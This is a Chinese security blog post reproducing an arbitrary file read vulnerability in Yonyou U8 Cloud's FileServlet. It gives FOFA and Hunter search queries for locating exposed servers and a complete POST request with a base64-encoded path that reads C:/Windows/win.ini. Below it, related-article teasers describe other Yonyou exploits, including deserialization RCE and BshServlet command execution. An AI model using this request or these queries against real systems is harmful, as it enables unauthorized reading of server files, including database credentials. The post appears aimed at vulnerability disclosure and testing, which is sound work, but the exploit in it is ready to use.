【漏洞复现】用友U8 Cloud FileServlet 任意文件读取

已于 2024-03-26 16:10:13 修改
阅读量588 收藏 2
点赞数 15
分类专栏: 漏洞复现 文章标签: web安全
于 2024-03-26 16:09:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40550150/article/details/137049448
版权

免责声明:文章来源互联网收集整理,文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

一、漏洞描述

用友U8 cloud /servlet/nc.bs.hr.tools.trans.FileServlet 任意文件读取漏洞,泄露数据库账号及密码等敏感信息。

二、影响版本

  • 用友U8 Cloud

三、资产测绘

  • hunterapp.name="用友 U8 Cloud"

  • fofa:app="用友-U8-Cloud"

  • 登录页面

img

四、漏洞复现

POST /servlet/nc.bs.hr.tools.trans.FileServlet HTTP/1.1
Host: 
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

path=QzovV2luZG93cy93aW4uaW5p

img

漏洞复现】用友-U8C-反序列化-FileManageServlet
知黑而守白
04-19 170
用友U8Cloud是用友网络科技股份有限公司(简称“用友网络”)推出的一款云端企业管理软件。用友U8Cloud提供了全面的企业管理功能,包括财务管理、人力资源管理、供应链管理、采购管理、销售管理等。支持多种业务模式,适用于不同行业和企业规模的需求,帮助企业实现数字化转型和云端化管理。用友U8C FileManageServlet接口存在反序列化漏洞,使得攻击者可以通过构造特定的请求远程执行恶意代码。此漏洞可能导致攻击者获取系统权限、执行任意命令,严重威胁系统的机密性和完整性。
用友U8 Cloud FileServlet 任意文件读取漏洞复现
0xSec
03-31 473
用友U8 Cloud FileServlet接口处存在任意文件读取漏洞,未经身份验证的远程攻击者通过漏洞可以获取系统内部配置文件,使系统处于极不安全的状态。
用友U8-Cloud接口FileServlet存在任意文件读取漏洞(含批量验证poc)_用友u8-cloud fileservlet接口存在任意文件读取漏洞
m0_60229361的博客
04-16 736
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
漏洞复现用友U8-Cloud FileServlet接口存在任意文件读取漏洞
https://blog.echo234.cn/
04-02 862
用友U8C是一款面向中小企业的ERP软件,为企业提供财务、采购、销售、人力资源、仓储物流等方面的综合管理解决方案。其优秀的功能和服务受到了众多企业的青睐和认可。其FileServlet存在任意文件读取漏洞,攻击者可通过该漏洞获取服务器主机敏感信息。
Yongyou U8cloud LoginVideoServlet 反序列化代码执行漏洞
qq_36334672的博客
01-25 531
用友的反序列化漏洞大部分cc6就可以直接打,post请求传入反序列化的二进制数据 就可以进行命令执行,ysoserial工具集成了多种cc链。FOFA:app=“用友-U8-Cloud用友U8 Cloud 所有版本。
用友U8Cloud FileServlet 任意文件读取漏洞复现(含nuclei-poc)
m0_50797689的博客
03-26 495
用友U8Cloud FileServlet 任意文件读取漏洞复现(含nuclei-poc)
用友U8-Cloud接口FileServlet存在任意文件读取漏洞(含批量验证poc)
weixin_43567873的博客
03-29 176
用友U8-Cloud接口FileServlet存在任意文件读取漏洞
用友U8 CRM downloadfile 任意文件读取漏洞复现
0xSec
04-30 701
用友U8CRM客户关系管理系统/pub/downloadfile.php接口处存在任意文件读取漏洞文件身份验证的远程攻击者通过漏洞可以获取到服务器敏感信息,导致系统处于极不安全的状态。
漏洞复现】用友 NC-Cloud uploadChunk 任意文件上传漏洞
alert['Hello World']
06-24 622
用友 NC-Cloud uploadChunk 接口存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限。
用友U8 Cloud 反序列化RCE漏洞复现
0xSec
11-08 4600
用友U8Cloud存在多处(FileManageServlet和LoginVideoServlet)反序列化漏洞,系统未将用户传入的序列化数据进行过滤就直接执行反序列化操作,结合系统本身存在的反序列化利用链,最终造成远程代码执行。
用友 NC bsh.servlet.BshServlet RCE利用
huangyongkang666的博客
01-09 6186
用友 NC bsh.servlet.BshServlet 远程命令执行漏洞
漏洞复现用友U8C任意文件读取漏洞
KKleeeaa的博客
03-26 389
的技术文章仅供个人研究学习参考。任何因传播或利用本实验室提供的信息而造成的直接或间接后果及损失,均由使用者自行承担责任。及作者对此概不负责。如有侵权,请立即告知,我们将立即删除并致歉。声明:亲爱的读者,我们诚挚地提醒您,Aniya。路径 是经过base64加密后的内容。0x01FOFA语句。0x02 漏洞POC。
用友 NC bsh.servlet.BshServlet 远程命令执行漏洞
Adminxe的博客
07-02 5545
0x00 漏洞描述 用友 NC bsh.servlet.BshServlet 存在远程命令执行漏洞,通过BeanShell 执行远程命令获取服务器权限 看到这个beanshell,就会想起来一个洞,是泛微OA的beanshell 0x01 漏洞影响 用友 NC 0x02 FOFA “用友网络” 0x03 漏洞复现 漏洞位置 /servlet/~ic/bsh.servlet.BshServlet 将POC修改为: exec(“whoami”) 0x04 利用总..
用友-u8-FileServlet-任意文件读取漏洞复现
weixin_43167326的博客
03-26 1167
用友U8是用友公司针对成长型企业推出的一款全面企业管理软件。该软件承载了用友人十余年来为成长型企业的信息化管理所倾注的心血,它见证了成长型企业信息化从简单管理到精细管理、从部门级应用到企业级应用到供应链级应用的发展历程。用友U8以“实时会计+智能财务+精准税务”为核心,提供会计核算、财务管理、税务管理和金融服务的一体化解决方案,满足企业对信息化、智能化及专业化的全面管理诉求。
用友U8-Cloud FileServlet接口存在任意文件读取漏洞
wan___she__pi的博客
04-02 290
U8 cloud U8 cloud不同于传统的ERP,融合了交易、服务、管理于一体,基于全新的企业互联网应用设计理念,为企业提供集人财物客、产供销于一体的云 ERP 整体解决方案,全面支持多组织业务协同、智能财务,人力服务、构建产业链智造平台,融合用友云服务实现企业互联网资源连接、共享、协同。QzovL3dpbmRvd3Mvd2luLmluaQ== 是C://windows/win.ini 的base64编码。该系统FileServlet存在任何文件读取漏洞。app="用友-U8-Cloud"
java nc接口开发_IUAP之接口开发
weixin_29338423的博客
03-02 826
一、说明开发环境UAP65接口开发有很多实现方法,这里记录两种简单的实现方式。(因截图较多,所以显得篇幅较长)接口开发需要将nc.uap.mde.wstools_1.0.3.jar包添加到eclipse/plugins下,就是UAP-STUDIO20151229132355\Platform\plugins下;二、首先创建UAP Project2.1此处选择的65版 2.2新建UAP Busine...
【网络安全 | 漏洞挖掘】隐藏的 DOS 技术
等风来
11-11 525
我调查了这些参数的用途,发现它们被传递给了第三方服务,且该服务的文档说明这些参数是安全的。你可以试试这样做:前往https://ash-speed.hetzner.com/并找到一个测试文件(大小大约1到10 GB),如果服务器等待URL请求完成,你可以通过大量此类请求来淹没服务器,从而导致它最终崩溃。于是我发送了一个包含1000个UUID的列表,结果网站在60秒后超时,并出现了显著的延迟。在我的案例中,这导致了客户网站的DOS攻击,问题被发现并快速修复,甚至在我报告漏洞之前。
等保测评怎么做?具体流程是什么?
weixin_59571541的博客
11-14 596
等保是指对信息系统进行等级化保护管理,目的是提高信息系统的安全性,防止信息泄露、篡改、破坏等安全问题。在哈尔滨进行等保测评的具体流程大致是:需求分析与准备、自评、选择测评机构、现场评估、问题整改、编写报告、报告审核与备案、持续改进。2.选择等保等级:根据系统的性质、重要性、涉及的敏感信息等,选择合适的等保等级(从1级到5级)。1.明确测评范围:首先需要确定需要进行等保测评的系统范围,包括硬件、软件、网络架构等。3.准备工作:准备相关的文档资料,包括系统架构图、设备清单、安全管理规程、系统开发/运营情况等。
等保二级需要哪些安全设备?
最新发布
bocco的博客
11-15 335
同时,还应加强安全管理措施的实施,提高员工的安全意识和能力,共同维护企业的信息安全。这些设备能够实时监测机房内的温湿度、漏水情况,一旦超出预设范围,便会自动报警,及时采取措施,确保服务器在适宜的环境中稳定运行。1. 防火墙:防火墙是网络安全的第一道屏障,能够控制进出网络的数据包,防止未经授权的访问和恶意攻击。在等保二级中,应部署下一代防火墙,其不仅具备传统防火墙的功能,还集成了入侵防御、防病毒等功能,能够更有效地保护服务器的安全。通过部署日志审计系统,可以及时发现并处理网络中的异常行为,提高网络的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值